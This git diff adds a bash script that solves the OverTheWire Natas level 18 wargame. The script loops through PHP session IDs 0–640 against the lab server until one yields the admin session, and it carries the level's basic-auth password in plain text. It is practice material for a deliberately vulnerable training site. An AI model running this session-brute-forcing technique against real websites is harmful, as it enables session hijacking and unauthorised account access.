diff --git a/overthewire/natas/scripts/natas18.sh b/overthewire/natas/scripts/natas18.sh
new file mode 100755
index 0000000..0a6f2aa
--- /dev/null
+++ b/overthewire/natas/scripts/natas18.sh
@@ -0,0 +1,26 @@
+#!/usr/bin/env bash
+
+#curl -v --cookie "USER_TOKEN=Yes" http://127.0.0.1:5000/
+
+USERNAME="admin"
+PASSWORD="arbitrary"
+
+req() {
+  local SESSION_ID=$1
+  curl http://natas18.natas.labs.overthewire.org/index.php \
+       -X POST \
+       -u natas18:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ \
+       -d "username=$USERNAME" \
+       -d "password=$PASSWORD" \
+       --cookie "PHPSESSID=$SESSION_ID" \
+       -sS \
+    | grep "regular user" &>/dev/null
+}
+
+MIN_ID=0
+MAX_ID=640
+for ((i=MIN_ID ; i <= MAX_ID ; i++)); do
+    printf "Attempt: %2d" $i
+    req "$i" && echo -en '\r' || $(echo " [admin]"; break)
+    
+done